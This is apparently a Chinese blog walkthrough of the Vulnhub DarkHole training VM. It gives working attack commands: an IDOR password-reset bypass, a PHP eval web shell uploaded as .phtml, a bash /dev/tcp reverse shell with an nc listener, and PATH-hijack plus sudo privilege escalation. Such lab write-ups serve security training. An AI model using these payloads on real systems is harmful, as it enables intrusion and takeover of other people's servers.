看完这篇 教你玩转渗透测试靶机vulnhub—DarkHole

简介: 看完这篇 教你玩转渗透测试靶机vulnhub—DarkHole

Vulnhub靶机介绍:


vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个漏洞靶机,老样子需要找到flag即可。

Vulnhub靶机下载:


官网链接:https://download.vulnhub.com/darkhole/DarkHole.zip

Vulnhub靶机安装:

下载好了把安装包解压 然后使用VMware打开即可。

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l发现主机



渗透机:kali IP :172.16.5.120 靶机IP :172.16.5.156

使用命令:nmap -sS -sV -T4 -n -p- 192.168.0.156


发现就开启了2280端口老样子先访问80端口,老样子扫一下端口三件套:dirb、dirsearch、gobuste扫描找到登入入口




②:逻辑漏洞:

先注册一个账号使用admin注册不行会显示下面爆红 随便注册一个666/666 使用BP抓包修改密码把id=3改为1即可。



这里现在密码已经更新 已经修改好了从新登入:admin/admin 发现登入成功!!!! 看到一个上传点 🆗又可以继续利用了



③:文件上传GetShell:

这里过滤了很多试了好几个都不行(连接不上)可以使用phar或者phtml进行绕过


新建一个文档输入: <?php @eval($_POST['cmd']);?> 把后缀改为png、jpg、gif 然后抓包 修改为phtml然后放包 有个蓝色的file点击即可


4cb4e94a3937413985535e4454a94c52.png



b01899d3fc9949d5aa5f5123c11e24b6.png



a899018b880d4200b24cf85a8cf6e0b3.png

944e3a84dd4f4520b557f6ce2b1d75d5.png


④:反弹Shell:
nc -nvlp 7777      #kaili监听端口   
bash -c 'bash -i >& /dev/tcp/172.16.5.156/7777 0>&1'  


49a24b81e53d4339bf00dd2d68505069.png

⑤:sudo root提权:

cat /etc/passwd 发现了john用户 在家目录下面发现了一个toto文件执行发现和id一样的功能


然后还有user和passwd文件 发现没有权限查看 创建名为id的文件,将bash文件的位置写入id当中,然后使用export修改环境变量,优先加载tmp下的id文件,echo输出path查看是否修改成功


8945429db2bd4721a9c3da85485b3f0e.png


b8dae01fc02647998005e86aa4f220d2.png

cd /tmp
touch id
echo "/bin/bash" > id
chmod 777 id
export PATH=/tmp:$PATH
cd /home/john
./toto

28cecf7c90c34539a8cf4ef5d86e275a.png


然后现在我们再次执行就可以查看账号和密码文件了 直接使用SSH进行连接:john/root123


import pty;pty.spawn("/bin/bash")  ##执行命令输入密码,回显可知,john可以以root的身份执行file.py
cat file.py
sudo python3 /home/john/file.py  ##sudo执行



3b497c0063014363a29c3c2ca1fba2c6.png


⑥:获取FLAG:



至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

这个靶机难度适中


1.信息收集 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster

2.这里有个新的知识点:逻辑漏洞 通过修改密码进行改包 完成绕过

3.文件上传漏洞 phtml和phar的绕过 CTF考的比较多

4.nc反弹Shell的命令这个是固定了(背下来)

5.sudo root提权的学习


希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

相关文章
|
安全 前端开发 PHP
[PiKaChu靶场通关]文件包含file include
[PiKaChu靶场通关]文件包含file include
1150 0
[PiKaChu靶场通关]文件包含file include
|
网络协议 物联网 开发者
NB-IoT 通信之 TCP 收发数据 | 学习笔记
快速学习 NB-IoT 通信之 TCP 收发数据
NB-IoT 通信之 TCP 收发数据 | 学习笔记
|
消息中间件 安全 Java
vulhub部分复现记录(后面大概都是原文档了,也比较难复现就不继续了)
本文介绍了多个软件的安全漏洞及其复现过程,涉及的软件包括Vulhub、Flask、ActiveMQ、Adminer、Airflow、Apache Druid、Apereo CAS、APISIX、AppWeb、Aria2、Bash、Cacti、Celery、CGI、ColdFusion和Confluence。每个部分详细描述了漏洞的背景、环境搭建步骤、漏洞复现的具体操作和验证方法。例如,Flask的SSTI漏洞通过构造特定的模板参数实现命令执行;ActiveMQ的反序列化漏洞利用特制的序列化对象触发;这些示例不仅展示了漏洞的危害性,还提供了实际的复现步骤,帮助读者深入理解这些安全问题。
3550 3
vulhub部分复现记录(后面大概都是原文档了,也比较难复现就不继续了)
|
Web App开发 iOS开发 开发者
Mac——基于Similator和Safari调试移动端页面
最近在开发移动端,需要在iphone环境下做一些调试,查看下是否有问题,但是手头上没有真机,不过当前主力本换成了`Mac`,所以就可以先用`Simulator`来调试下。
1369 8
|
数据处理 Python
深入探索:Python中的并发编程新纪元——协程与异步函数解析
【7月更文挑战第15天】Python 3.5+引入的协程和异步函数革新了并发编程。协程,轻量级线程,由程序控制切换,降低开销。异步函数是协程的高级形式,允许等待异步操作。通过`asyncio`库,如示例所示,能并发执行任务,提高I/O密集型任务效率,实现并发而非并行,优化CPU利用率。理解和掌握这些工具对于构建高效网络应用至关重要。
327 6
|
SQL 安全 网络安全
看完这篇 教你玩转渗透测试靶机vulnhub—DarkHole2
看完这篇 教你玩转渗透测试靶机vulnhub—DarkHole2
1137 0
|
安全 网络安全 数据库
扫描神器:Nessus 保姆级教程(附步骤)
扫描神器:Nessus 保姆级教程(附破解步骤)
|
安全 测试技术 数据库
Sqli-lab教程-史上最全详解(1-22通关)_sqlilabs(1)
Sqli-lab教程-史上最全详解(1-22通关)_sqlilabs(1)
|
安全 Shell 网络安全
基于Vulnhub靶场之DC-3渗透测试过程
Vulhub靶场介绍: [Vulhub](https://vulhub.org/) 是一个专注于安全漏洞复现和学习的开源项目。它提供了各种常见漏洞的复现环境,帮助网络安全从业者学习和研究漏洞利用技术。这些环境涵盖了Web应用、容器和操作系统等多个领域。Vulhub 的特点包括: 1. **丰富的漏洞场景**:覆盖多种常见的漏洞,如SQL注入、XSS等。 2. **详细复现指南**:为每个漏洞场景提供详细的环境搭建和利用步骤,便于学习和实践。 3. **易于使用**:提供一键部署或Docker镜像,简化环境搭建过程 4. **持续更新与维护**:项目在GitHub上开源,不断接收社区的贡献和更新
1033 1
|
安全 Linux 测试技术
最新版Kali虚拟机安装和汉化中文教程
本文是对渗透测试安全人员经常使用的测试系统的最新版进行的一次系统配置下载安装配置,同时包含汉化的教程,是对自己熟悉系统安装环境配置的一次总结
5912 0